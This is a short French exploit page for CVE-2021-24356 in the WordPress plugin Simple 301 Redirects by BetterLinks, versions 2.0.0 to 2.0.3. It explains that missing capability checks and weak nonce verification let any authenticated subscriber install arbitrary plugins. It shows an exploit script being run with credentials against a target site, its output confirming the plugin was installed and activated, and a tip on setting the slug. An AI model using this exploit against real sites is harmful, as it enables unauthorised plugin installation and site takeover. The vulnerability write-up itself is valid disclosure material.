
Simple 301 Redirects par BetterLinks - 2.0.0 – 2.0.3 - Abonné + Installation arbitraire de plugin
Simple 301 Redirects par BetterLinks - 2.0.0 – 2.0.3 - Abonné + Installation arbitraire de plugin
Un manque de vérifications de capacités et une vérification insuffisante du nonce sur l'action AJAX dans le plugin ont permis à des utilisateurs authentifiés d'installer des plugins arbitraires sur des sites vulnérables.
$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}
Remarque : Certains plugins peuvent ne pas s'activer si vous ne modifiez pas la variable sluga pour qu'elle corresponde au chemin/fichier.php qui est le fichier principal du plugin. Actuellement, cela fonctionne très bien lorsque le slug est quelque chose comme betterlinks et que le fichier principal du plugin s'appelle betterlinks.php.